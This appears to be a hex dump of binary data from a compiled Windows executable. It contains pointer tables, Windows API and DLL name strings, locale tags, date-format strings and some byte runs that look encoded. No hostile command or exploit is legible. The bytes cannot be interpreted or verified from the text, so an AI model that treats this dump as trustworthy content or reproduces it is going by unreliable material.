00b773f8b7b54a4427f4fe1d00b7c34337ea1a1a15008545b5d852ea888815008b53534427aca51e00b7c35c9bc188df60ba008361dd77c344878938ff4e8923e44fc287c40e82552938855eaf78874023347251007c4b3714e931f388c3d7781478cb47e47f9c0f0084c1c5682c44c757efe19ac19858c2c84b40c1d95841c2c84b81d94059c2c84b8bcb50e7b6c2c84b81d94c55c2c84b81d97069c2c84b40c1d97861c2c84b8fd744d70f0084cb6fa400cbe740143048c5809a12850083e7400c2841f9bb0300004576fa8dcdcd60049aba000040bfea2c2d140048c18cbf16ac0048cb478c8b0f84cb6fc460c386a405ac0048c5cc434acb7bf97770f9ea3435140048cb47eceb0f000000000000000000aa0069109b840000000048cb6fe407a1b238af8f206ccb47cccb4ac5682c07a1fa702ccbcca1f2782cb1793f0000de6d682c07a1fa702ccba569212b1f9f850073677269212b1d9d8500767cf8ba4722e53aba4725eb020f000084cb6fa4cbe740143048c3cf605c30c1cd600c60c3cf605438c1cd6004c8ee06000048cb478c8b0f84c34f8cc1d14858c1f96850c1f15868c1c1405d1dc367a4cb6fcc68c3519bca7ac2e16db20d00c049d8554cc3ce5599d95840c3ce5599d95c4db736d0647945c3ce55af308f00c043cb4c0540b736c2767945c3ce55af2c9300c043cb4c0643b736c1757945c3ce55af2e9100c043cb4c0045b736c4707945c3ce55af318e00c043cb4c0c49b736c87c7945c3ce55af2f9000c043cb4c1458c3c65d58c3884b8929efc621e4f327e372498b63f021704940c3c65d58c3884b8929e1c821e3f427e372498b63e839704940c3c65d58c3884b8929e2cb21e2f527e372498b63e435704940c3c65d58c3884b8929e308c33727e372498b63e233704983884bc3c65d588929e4fb27e372498b63e1307049e037dd020048c35b78a9757c40c3c65d93ca451cb8ac707c40c3c65d93ca4504a0a07c7c40c3ce5593cb4408f234d2647c40c3ce5593cb440ef434e2547c40c3ce5593cb440d8a88bab9606000486be2b54a76753d20200074526e753d404000747a4673fab44578c3ce55938b0be8cc6fc3ce5593a3deb6c3ce55938b0ae9fc5fc3ce5593a3ddb5c3ce55938b09eaec4fc3ce5593a3dcb4c3ce55916719f00f00c127e384a13f1ffe01b7c3ce55193978c3ce5558c3fe4dbbcb682182fe3d4074477bc3ce55aa5b1e0000de717068c3ce75bb8340c3ce5599c15858c3ce5593cb286149c3ce5531713028c3ce559b8587c118bba300c3c65d51f95b1c000074ca616162e3434bca8bc86168c3ce7578c38340c3ce5558c1c15858c3ce5593cb286149c3de459bc9222162e3434bca8bcb2228c3ce5558c39d5ec1d900b80ee6000033e19ec1c05d9b448bc9cf43feea3137130048c3c65de6b7491864714d47b58934f1b749007c714d47b5893affb7490c70714d47b58939fcb7490a76714d47b58938fdb7490975714d47b5893f878a8263e37744b36be9756b9c6be9757a8d7bf9745d60c98a0b606000ebf45747b5893e4547b59125e5f85b47b5893d4647b59126e6ec4fc9a2dc6060007cfe3d4074738cca11d98fedec4fc3ca1118c18f4ec3d7781c70c3ff506408c3f7586c00cb47e47d9e0f0084cb6fc4ab7af8756198ccbf7d7bf9766ff00644550038c722220000ebe0e3094b550038c72121000048cb47eceb0f008c131bcb6fccc8adb9030074535b60dcd7bda9030074488bcb47e47b980f000084c1d5783c50c1fd5004771fcb6fcc68c35192c37211feea0300747b79cd601cb3403c265048b6ff7f00dcebebd8f0c446c56814b0bdb82da800007451d337813454c81102040014fcd1c375d8a800008bc76814b3625e570c1f040074ff501cd3e38b625e573e2d0400744d8ec3d7786408c3ff506c00cb47e47f9c83131bcb6fcc68c352314e5d04007c60dc34c8484380cb47e47bb24c5e04003384cb6fc4c0637004007c63df77cb47eceb0f33dae1cb0f00ffda23161000cc0000000000802f227d7976fa854fc28dc759934eb8f754514ab8ef5e4ecb43d8514ac385c05eaf6a95db5c4077e9a07881c3400bc98677eaa37c4fbe3e89cb43e86d7ef0b990d1f3030f000000000000000000000084c1d5782c5f1fcb6fcc68c35291c5b0e192b100b7c34427dc3400008545b4566a63f497c3589bc344276a7d0000b7cd45b47b84cb64e529f7e8275363e1eae931f388c3d7781478cb47e47f9c0f000084c34a78f4175a00665f317c7730f3038b2b2b74744bcbfbf341b8691545007579b6b1090200665f6849179b54030f0084cb6fc465c6ca7970c34183c25a39e50d0000b8b901000048cb47eceb0f00008c1316ce9350c3519bc2601bb4c74288b7f60448c75aa56752cacb48452e3354f32f944fd2992bab846ff2982aa089c19f0458c3c8539bc340404b4843feb7420c7b7e05b9f742806310bc4fcb847ff983c24292b2de5b930033000000000000000000000000aa0069109b840000000048cb6ffc5cc59d3068c5d5782c457ee897c1d9703c5467fb9d424d91b629c79739351000004d76e82181647127c063e2f0bdc0169bf00f00be87c5034d76e821879aa3c79f3068c7d7782c40cb47d4e2310f0000000000000000000000000000000000000000aa0069109b84000000004cc75295c7599bca7be81f89f670000049ca7bd8563c0263faa27c46c2498b4ac38873f3c783ba35030049c879788000000f89ef6b02000fb59f30b9ac00010e8c28aa010049c2488fc75497c372b0c24384c74d8fc2790157edc27bb9c27038cc1f12434e1f5c5ce0ff1e10404e1e5d44f8b8c34a02a50069109b840000000048c34a8dc180ebaab300bcc8070da694b300494aca361e91c3b3008f3cb30071c2b3007fccb300bb08b300c073b300d063b300e053b30078cbb30010a4b4002094b400a013b3003084b400f84bb30040f4b40060d4b4009526b3000f105b4400c3ccb8bd6cef81cb8bc38142c181cbccb8bd4e4bb9f44064ef814cccc842c1ccb9bc8280cb30fc606df1fc707fc3a5f6dcc7890db8fd424c4bb9fc4046c58966efc1404cccc04243c2400848818381cb48814e4bb9f4468d814cccc844c7a5f61b814e4bb8f5468d816e22cdc944c7531b814e4bb8f546404bb9fc4c8f816e22cdc94440ccc04ec58fc78989c1424c4bb9fc4640c58989c1404cccc044cfa5f6dcc7890db9fc4244c58988c040cba5f6dcc7890db8fd4244c58966efc140cb53dcc78989c14244c58989c140cbcc101f4cc78989c1424c4bb8fd4640c58989c1406e22cdc144cfa569109b84000000004cc78989c1424c4bb8fd46484bb9e45c42c58989c1406e22cdc14448ccd85ecdcc1f140e464fc289cb42d151b735cc7b671c27e080cb6211ff1f140e42cb42d1514e1e1a4767ea8cc643818828ee088b0c8800000f2668b1bc77366cfa9b007661fe2bc20000660069109b84000000000f2668a1ef2660b9ff1f140e051f5c461a58c940418000000f2668c18f2660d99f1f544eaaaf1f5c46baf9b636c62668e1af2660f9bf1f544ecacf1f5c46dadf266881cf266099df1f544eeaef1f5c46fa85d8a22668a1a9ca639f7027e92ae7031f140e42cb42d159ca6bf85dc643818828ed70687a000069109b84000000000f1e50b1ff1f140e42cb42d159b636bc9aa6ca63ef7b7944c4890c071f5c4ef2ff1e59b8ff1e50b1b9c24800cc105f400f246aa1ef2462b9ff179c8e0a0202000f1f140e051f5c461a58c940418000000f246ac18f2462d99f1f544eaaaf1f5c46baf9b636c6246ae1af2462f9bf1f544ecacf1f5c46dadf179c8e4a4202000f246a81cf246299df1f544eeaef1f5c46fa85e892a15611d1c70000f0105b4400494acbc71f544efab8cb6af959ca6bf8e637ce7b635fc34a89cb6211ff1fd8c71f140e051e1944c74a8c66e88ec643818828ee731c672628eae66b69105b44000f2668511f2620061f544efaff1f5c46eaa8c968698000000f2668317f2660296f1f544e5a5f1f5c464a09b636c62668115f2660094f1f544e3a3f1f5c462a2f2668713f2660692f1f544e1a1f1f1c067fdba126685159ca639f7027e98cc643818828ed706e7c0069109b84000000000f1e1049cb6af91f1f140e43b636bc85b9ca63ef7b7c494e1f1a4b4e1e1a041e1048c248000f00000000000000000000000000000000aa0069109b84000000004863fa98ca7bf07a50d437c6736072f61a8b3b3e0e7f5964b73e88b6373e37c6729ba3c643818828ea766a52c845b47b858b3b3e0e7f7944b73e88b637bd84b97bf303d8db435b273c53d98828eb76437fc38a49733f0e7f2e13c3ca4940737f4e027d3904c3ca5158737f4e1a654875c3ca5950737f4e126d5b66cb42e169b636bcb884ca63ff52c643818828ea77efd3c38a49733f0e7f6e53cb42c941b636bc9ba7ca63e7ec68cbcb42c940cb42c940cb42c940c3871d5947c78047c68173fadadb435b273c0f0000000000000000000000000000aa0069109b8400000000ff1f2c000000000000000000000000008c151dcb6fcc68c36160c70d08cb47e47db423a59000338c151dcb6fcc68c361021b9e920075c77570cb47e47db447c19000338c151dcb6fdc78c361a2c38a8a9b58c1c5680ca1dd70046cc1804e259900b3c7ce35fbde3d20c3c62d88cb4e92006fd8cb47f46d9e0f8c151dc361a2c38a32fa48b93d0500c0cf9b554a4a9c9e0f8c151dcb6fcc68c361a2c38a8a83e094fe7d006fd8cb47e47d9e0f8c151dcb6fcc68c36153bb02000048cb47e47db4ed9d6600338c151dcb6fcc68c361a2c3ce0dc38340cb47e47db403726700338c151dcb6fcc68c361a2c30e0d8800008b8340cb47e47db424556700338c151dcb6fcc68c36153bc05000048cb47e47db45d2c6700338c151dcb6fcc68c361d9fa81cb47e47db477066700338c151dcb6fcc68c3616a3d3d80000000747fb2ba030000e8691967006fd8cb47e47d9e0f8c151dcb6fcc68c36153bd04000048cb47e47db488f96700338c151dcb6fcc68c36153be07000048cb47e47db4a1d06700338c151dcb6fcc68c361a2c3c62580fdaa40006fd8cb47e47d9e0f8c151dcb6fcc68c36153b108000048cb47e47db4fc8d6700338c151dcb6fcc68c36153b108000048cb47e47db4156b6800338c151dcb6fcc68c36161c61d18cb47e47db4506b2d00338c151dcb6fcc68c361a2c3c67d78cb47e47db444134100338c151dcb6fcc68c361a2c3ce0dc38340cb47e47db46e552d00338c151dcb6fcc68c361a2c38a80b93d0500c0b4788db9251d00c0b47037f32beebdb901000048cb47e47d9e0f00000000000000000000000000008c151dcb6fcc68c361a2c38a32fa48b93d0500c0cf9b554a4a89cb47e47d9e0fcc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d095440100000000d89d440100000000e6a3440100000000f4b144010000000002444701000000005a114a01000000004a014a01000000003c774a0100000000a6e0470100000000bafc470100000000d492470100000000e8ae4701000000000443460100000000226546010000000036714601000000004a0d460100000000662146010000000080c746010000000096d1460100000000aceb460100000000c681460100000000dc9b460100000000f0b7460100000000024a490100000000165e490100000000246c4901000000003c744901000000004c044901000000005c14490100000000743c4901000000008cc4490100000000a4ec490100000000cc84490100000000d890490100000000e6ae490100000000f4bc490100000000feb64901000000000c454801000000001e5748010000000030794801000000003e77480100000000541d4801000000006a2348010000000080c948010000000096df480100000000a2eb480100000000aee7480100000000bef7480100000000ca83480100000000de97480100000000eea7480100000000004a4b01000000000a404b0100000000165c4b010000000022684b0100000000347e4b0100000000460c4b0100000000602a4b01000000007a304b01000000008cc64b01000000009cd64b0100000000aae04b0100000000bcf64b0100000000c8824b0100000000d69c4b0100000000e6ac4b0100000000f2b84b0100000000064d4a0100000000165d4a010000000028634a010000000068234a01000000000000000000000000783e470100000000662047010000000052144701000000003e7847010000000020664701000000008acc47010000000000000000000000001426328081010000c077b78081010000000000000000000000000000000000000000000000000000189c848081010000e0967680810100008028a880810100000000000000000000000000000000000080f8788081010000fc57ab80810100000078788081010000000000000000000000000000000000000000000000000000000000000000000000000000000000000059588181010000a0f958818101000038fbc380810100005093c380810100009053c38081010000d013c380810100006161646476766161707069693333323200000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6666696962626565727273732d2d6c6c31312d2d31312d2d31310000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d737379796e6e636368682d2d6c6c31312d2d32322d2d303000000000000000006b6b656572726e6e65656c6c3333323200000000000000000101000003030000462a1f322d00030c63000000000000000101000003030000462a1f35341700650101000003030000462a1f34221122370d191065000000000101000003030000462a1f20361122370d1910650000000002020000030300004927071d1d080d05131f26311b1d1d0a020d3f3606171d06012b3d780000000000000000000000009057c78081010000a067c78081010000a86fc78081010000b87fc78081010000c80fc78081010000d81fc78081010000e82fc78081010000f83fc7808101000004ccc8808101000010d8c8808101000018d0c8808101000028e0c8808101000038f0c88081010000428ac88081010000448cc880810100005098c880810100005890c880810100005c94c8808101000060a8c8808101000064acc8808101000068a0c880810100006ca4c8808101000070b8c8808101000078b0c88081010000844cc880810100008840c880810100008c44c880810100009058c88081010000945cc880810100009850c880810100009c54c88081010000a068c88081010000a46cc88081010000a860c88081010000ac64c88081010000b078c88081010000b47cc88081010000b870c88081010000bc74c88081010000c008c88081010000c40cc88081010000c800c88081010000cc04c88081010000d018c88081010000d41cc88081010000d810c88081010000dc14c88081010000e028c88081010000e42cc88081010000e820c88081010000ec24c88081010000f038c88081010000f43cc88081010000f830c88081010000fc34c8808101000000c9c9808101000010d9c9808101000020e9c9808101000028e1c9808101000038f1c980810100005099c9808101000060a9c9808101000078b1c980810100009851c98081010000b871c98081010000d811c98081010000f831c9808101000018d2ca8081010000408aca808101000060aaca80810100008842ca8081010000a862ca8081010000d01aca8081010000f03aca808101000000cbcb808101000004cfcb808101000010dbcb808101000020ebcb8081010000448fcb8081010000509bcb808101000060abcb808101000070bbcb8081010000905bcb8081010000b07bcb8081010000d813cb808101000000cccc808101000028e4cc80810100005894cc808101000078b4cc8081010000a06ccc8081010000c804cc8081010000f834cc808101000028e5cd80810100004885cd8081010000428ac880810100005895cd808101000070bdcd8081010000905dcd8081010000a865cd8081010000c805cd80810100005f003d031216014c28000000000000005f003c0701060f6c5f002f111210020d6c000000000000005f002c071007020d006c0000000000005f002b1c011a10020d006c00000000005f003907120717020d006c00000000005f00291306171b1d11020d006c0000005f003c0f1e11020d006c00005f003a04030b6900000000005f002f04064402345f002d171607061b0a177400000000005f002a1b0f0d050e090b01640000000072171607061b0a175c280000204e0b12770000000000000020440109091111653d3d00003e003e003c003c00212100003d003d00211c3d005b065d00000000006f1f151713151b1d720000002d133e002a2a00002b002b002d002d002d2d00002b2b0000262600002d13142a2f2f0000252500003c3c00003c013d003e3e00003e033d002c2c0000280129007e7e00005e5e00007c7c0000260026007c007c002a173d002b163d002d103d002f123d0025183d003e00033d3c00013d261b3d007c413d005e633d006016101215030e0942270000000000006016141615030e094227000000000000601615020d004b2760140d09150a09412700000000000000600c030c020d4c530715151d0a4347121413164327000000601307061b07094027000000000000006016140312164544011607060716171b1d5527000000000060161306171b1d5244010909111d07094744011607060716171b1d5527000000600401030714191854430c011d07060716171b1d52430f031c06071742270000601310020d0d135244010909111d07094744011607060716171b1d552700000060161306171b1d52430c011d07060716171b1d52491d111713151b1d5527000060161306171b1d5244011607060716171b1d52491d111713151b1d552700000060161306171b1d52561403121645430c011d07060716171b1d52491d111713151b1d55270000000060161f1b0601140d4c440d1a031c0d020608080b1a544d0c115727000000000060050d48561306171b1d52430c011d07060716171b1d52491d111713151b1d55270000000000000060050d48561306171b1d5244011607060716171b1d52491d111713151b1d552760050d48561306171b1d52561403121645430c011d07060716171b1d52491d111713151b1d55270060030c1f0959430c011d07060716171b1d52430f031c06071742270000000000601511105452171101071c070709402760250d48603206001d49000000000000600c030c020d4c56101215030e094227600c030c020d4c56101215030e0945430c011d07060716171b1d52430f031c0607174227204e0b122c065d0000000000204401090911113e065d000000000000600f0203074943020d001f1a0e40270060101c0d020608080b1a5444010909111145430f031c0607174227000000000060101c0d020608080b1a544401090911113e067d430f031c0607174227000000600d0c0f0f06020144561306171b1d52430c011d07060716171b1d52491d111713151b1d55270000600d0c0f0f06020144561306171b1d5244011607060716171b1d52491d111713151b1d552700000060050d48561306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d5527000060050d48561306171b1d52561403121645430c1f0959430c011d07060716171b1d52491d111713151b1d55270000000060041d170f0c040a434907071d1d080d05131f175246091d520727000000000060041d170f0c040a434115111d111d5444011607060716171b1d5246091d5207270000000000000060161306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d5527000000000060161306171b1d52561403121645430c1f0959430c011d07060716171b1d52491d111713151b1d552700000000000000600d0c0f0f06020144561306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d55270000000000600c030c020d4c530715151d0a43541c1a1704054447121413164327000000006f1f151713151b1d520200022000000020742d09154564211610111b19041b1d5527000000000000206223121645632f0d12005364211610111b19041b1d52411554082800000000206223121645632f0d12005361330013185e27000000000020632f0d12005368210c171313110b115964211610111b19041b1d552700000020632c021d1c091111456f2d080f0617546c230c02151b1d55270000000000000000000000000000050500c0cb0b000000000000000000001d1d00c0c40400000000000000000000969600c0c404000000000000000000008d8d00c0c808000000000000000000008e8e00c0c808000000000000000000008f8f00c0c80800000000000000000000909000c0c80800000000000000000000919100c0c80800000000000000000000929200c0c80800000000000000000000939300c0c80800000000000000000000b4b602c0c80800000000000000000000b5b702c0c808000000000000000000000c0c000000000000030300000000000009090000000000006d6d737363636f6f7272656565652e2e64646c6c6c6c0000432c1d373d111d24221d0c061600730084c34780810100000000000000000000cc8b478081010000000000000000000084d25680810100004413578081010000c0ab6b8081010000c0ab6b8081010000ecbc508081010000500151808101000068056d808101000084e96d8081010000000000000000000020684880810100008cdc508081010000c89850808101000078176f8081010000b4db6f808101000098f36b8081010000c0ab6b80810100007c1b67808101000000000000000000000000000000000000c0ab6b808101000000000000000000002860488081010000c0ab6b8081010000bcfb47808101000098df478081010000c0ab6b80810100008050d08081010000d000d080810100005093c3808101000010c1d180810100005081d18081010000a071d1808101000000d2d280810100005082d280810100009053c380810100009042d28081010000d002d2808101000010c3d380810100005083d38081010000a073d3808101000000d4d4808101000060b4d48081010000b064d4808101000038fbc38081010000d013c3808101000000d5d580810100006161707069692d2d6d6d73732d2d777769696e6e2d2d6161707070706d6d6f6f646465656c6c2d2d727275756e6e747469696d6d65652d2d6c6c31312d2d31312d2d31310000000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6464616174746565747469696d6d65652d2d6c6c31312d2d31312d2d313100006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d666669696c6c65652d2d6c6c32322d2d31312d2d3131000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6c6c6f6f636361616c6c69697a7a6161747469696f6f6e6e2d2d6c6c31312d2d32322d2d3131000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6c6c6f6f636361616c6c69697a7a6161747469696f6f6e6e2d2d6f6f626273736f6f6c6c6565747465652d2d6c6c31312d2d32322d2d303000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d707072726f6f636365657373737374746868727265656161646473732d2d6c6c31312d2d31312d2d32320000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d73737474727269696e6e67672d2d6c6c31312d2d31312d2d30300000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d73737979737369696e6e66666f6f2d2d6c6c31312d2d32322d2d3131000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d777769696e6e727274742d2d6c6c31312d2d31312d2d303000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d7878737374746161747465652d2d6c6c32322d2d31312d2d30300000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d7272747463636f6f727265652d2d6e6e747475757373656572722d2d777769696e6e64646f6f77772d2d6c6c31312d2d31312d2d3030000000006161707069692d2d6d6d73732d2d777769696e6e2d2d737365656363757572726969747479792d2d737379797373747465656d6d666675756e6e6363747469696f6f6e6e73732d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6b6b656572726e6e65656c6c333332322d2d7070616163636b6b6161676765652d2d636375757272727265656e6e74742d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6e6e747475757373656572722d2d6464696961616c6c6f6f676762626f6f78782d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6e6e747475757373656572722d2d777769696e6e64646f6f7777737374746161747469696f6f6e6e2d2d6c6c31312d2d31312d2d303000000000757573736565727233333232000000000202000012120000020200001212000002020000121200000202000012120000000000000e0e000047221137360700170b1a243102080a06022c2d6400000000080800001212000004040000121200004c0f0e2c112327061b0709223d78000004040000121200004c230c020d092b2f0c08313b230f0a0d44000000000000000101000016160000020200000202000003030000020200000404000018180000050500000d0d00000606000009090000070700000c0c0000080800000c0c0000090900000c0c00000a0a0000070700000b0b0000080800000c0c0000161600000d0d0000161600000f0f000002020000101000000d0d000011110000121200001212000002020000212100000d0d00003535000002020000414100000d0d000043430000020200005050000011110000525200000d0d0000535300000d0d00005757000016160000595900000b0b00006c6c00000d0d00006d6d000020200000707000001c1c000072720000090900000606000016160000808000000a0a0000818100000a0a000082820000090900008383000016160000848400000d0d000091910000292900009e9e00000d0d0000a1a1000002020000a4a400000b0b0000a7a700000d0d0000b7b7000011110000cece000002020000d7d700000b0b0000181f07000c0c000018cfd7808101000028ffd7808101000038efd78081010000489fd780810100006a6a61612d2d4a4a50500000000000007a7a68682d2d43434e4e0000000000006b6b6f6f2d2d4b4b52520000000000007a7a68682d2d54545757000000000000000000000000000020fada808101000024feda808101000028f2da80810100002cf6da808101000030eada808101000034eeda808101000038e2da80810100003ce6da8081010000449eda8081010000508ada80810100005882da808101000068b2da808101000074aeda8081010000805ada80810100008c56da8081010000904ada8081010000944eda80810100009842da80810100009c46da8081010000a07ada8081010000a47eda8081010000a872da8081010000ac76da8081010000b06ada8081010000b46eda8081010000b862da8081010000c01ada8081010000c812da8081010000d40eda8081010000dc06da80810100009c46da8081010000e43eda8081010000ec36da8081010000f42eda808101000000dbdb808101000010cbdb808101000018c3db808101000028f3db808101000034efdb808101000038e3db8081010000409bdb8081010000508bdb808101000068b3db8081010000010100000000000078a3db8081010000805bdb80810100008853db8081010000904bdb80810100009843db8081010000a07bdb8081010000a873db8081010000b06bdb8081010000c01bdb8081010000d00bdb8081010000e03bdb8081010000f823db808101000010ccdc808101000020fcdc808101000038e4dc8081010000409cdc80810100004894dc8081010000508cdc80810100005884dc808101000060bcdc808101000068b4dc808101000070acdc808101000078a4dc8081010000805cdc80810100008854dc8081010000904cdc80810100009844dc8081010000a874dc8081010000c01cdc8081010000d00cdc80810100005884dc8081010000e03cdc8081010000f02cdc808101000000dddd808101000010cddd808101000028f5dd808101000038e5dd8081010000508ddd808101000064b9dd80810100006cb1dd808101000078a5dd8081010000904ddd8081010000b865dd8081010000d00ddd808101000053261b6e4d22016e5421106557320164543c1d7546341b695332157453261b0a051879004d22010a051879000000000054211016170518795732010a0b1617051879000000000000543c1d07011705187900000046341b0d05187900000000005332150107160518790000004a2b0f6e462307624d2c1372413102724d2c18794a3f1b6e4a3f196c41341267533615704f2c17744e21197644210663000000004a2b0f1b14130b79462307100714130b790000004d2c13110b6800004131021b056c00004a3f1b0b650000004a3f1915790000004134121206077400000000005336150411080f0717720000000000004f2c171b0d0717724e211913080f0717720000000000000044210606080f071772000000410c4d00501d4d00000000004d00624b004b5600790000000000000064000000480c6d0000006d4400480c59000000790000000048007257005749007300000000000000535375756e6e00004d4d6f6f6e6e000054547575656500005757656564640000545468687575000046467272696900005353616174740000535375756e6e646461617979000000004d4d6f6f6e6e64646161797900000000545475756565737364646161797900005757656564646e6e65657373646461617979000000000000545468687575727273736464616179790000000000000000464672726969646461617979000000005353616174747575727264646161797900000000000000004a4a61616e6e000046466565626200004d4d61617272000041417070727200004d4d6161797900004a4a75756e6e00004a4a75756c6c0000414175756767000053536565707000004f4f6363747400004e4e6f6f7676000044446565636300004a4a61616e6e757561617272797900004646656562627272757561617272797900000000000000004d4d616172726363686800000000000041417070727269696c6c0000000000004a4a75756e6e656500000000000000004a4a75756c6c7979000000000000000041417575676775757373747400000000535365657070747465656d6d6262656572720000000000004f4f636374746f6f62626565727200004e4e6f6f767665656d6d626265657272000000000000000044446565636365656d6d6262656572720000000041414d4d0000000050504d4d00000000000000004d4d4d4d2f2f646464642f2f79797979000000000000000064646464646464642c2c20204d4d4d4d4d4d4d4d2020646464642c2c202079797979797979790000484848483a3a6d6d6d6d3a3a73737373000000000000000065656e6e2d2d5555535300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000202020202020202020202020202020202020282828282828282828282020202020202020202020202020202020202020202020202020202020202020202020204848101010101010101010101010101010101010101010101010101010101010848484848484848484848484848484848484848410101010101010101010101010108181818181818181818181810101010101010101010101010101010101010101010101010101010101010101010101010101010110101010101010101010101082828282828282828282828202020202020202020202020202020202020202020202020202020202020202020202020202020202101010101010101020200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f210301070103010f010301070103011f010301070103010f010321070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f210301070103010f010301070103011f010301070103010f01032107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301fe0100000000000020d2f28081010000020200000000000028daf28081010000030300000000000030c2f28081010000040400000000000038caf28081010000050500000000000048baf28081010000060600000000000050a2f28081010000070700000000000058aaf2808101000008080000000000006092f280810100000909000000000000689af280810100000a0a0000000000007082f280810100000b0b000000000000788af280810100000c0c0000000000008072f280810100000d0d000000000000887af280810100000e0e0000000000009062f280810100000f0f000000000000986af280810100001010000000000000a052f280810100001111000000000000a85af280810100001212000000000000b042f280810100001313000000000000b84af280810100001414000000000000c032f280810100001515000000000000c83af280810100001616000000000000d022f280810100001818000000000000d82af280810100001919000000000000e012f280810100001a1a000000000000e81af280810100001b1b000000000000f002f280810100001c1c000000000000f80af280810100001d1d00000000000000f3f380810100001e1e00000000000008fbf380810100001f1f00000000000010e3f38081010000202000000000000018ebf38081010000212100000000000020d3f38081010000222200000000000028dbf38081010000232300000000000030c3f38081010000242400000000000038cbf38081010000252500000000000040b3f38081010000262600000000000048bbf38081010000272700000000000050a3f38081010000292900000000000058abf380810100002a2a0000000000006093f380810100002b2b000000000000689bf380810100002c2c0000000000007083f380810100002d2d000000000000788bf380810100002f2f0000000000008073f380810100003636000000000000887bf3808101000037370000000000009063f380810100003838000000000000986bf380810100003939000000000000a053f380810100003e3e000000000000a85bf380810100003f3f000000000000b043f380810100004040000000000000b84bf380810100004141000000000000c033f380810100004343000000000000c83bf380810100004444000000000000d023f380810100004646000000000000d82bf380810100004747000000000000e013f380810100004949000000000000e81bf380810100004a4a000000000000f003f380810100004b4b000000000000f80bf380810100004e4e00000000000000f4f480810100004f4f00000000000008fcf48081010000505000000000000010e4f48081010000565600000000000018ecf48081010000575700000000000020d4f480810100005a5a00000000000028dcf48081010000656500000000000030c4f480810100007f7f00000000000038ccf48081010000010504000000000040b4f48081010000020604000000000050a4f4808101000003070400000000006094f480810100000400040000000000489fd7808101000005010400000000007084f4808101000006020400000000008074f4808101000007030400000000009064f48081010000080c040000000000a054f48081010000090d040000000000d00ddd80810100000b0f040000000000b044f480810100000c08040000000000c034f480810100000d09040000000000d024f480810100000e0a040000000000e014f480810100000f0b040000000000f004f48081010000101404000000000000f5f58081010000111504000000000018cfd78081010000121604000000000038efd78081010000131704000000000010e5f58081010000141004000000000020d5f58081010000151104000000000030c5f58081010000161204000000000040b5f58081010000181c04000000000050a5f58081010000191d0400000000006095f580810100001a1e0400000000007085f580810100001b1f0400000000008075f580810100001c180400000000009065f580810100001d19040000000000a055f580810100001e1a040000000000b045f580810100001f1b040000000000c035f580810100002024040000000000d025f580810100002125040000000000e015f580810100002226040000000000f005f58081010000232704000000000000f6f68081010000242004000000000010e6f68081010000252104000000000020d6f68081010000262204000000000030c6f68081010000272304000000000040b6f68081010000292d04000000000050a6f680810100002a2e0400000000006096f680810100002b2f0400000000007086f680810100002c280400000000008076f680810100002d29040000000000986ef680810100002f2b040000000000a85ef680810100003236040000000000b84ef680810100003430040000000000c83ef680810100003531040000000000d82ef680810100003632040000000000e81ef680810100003733040000000000f80ef68081010000383c04000000000008fff78081010000393d04000000000018eff780810100003a3e04000000000028dff780810100003b3f04000000000038c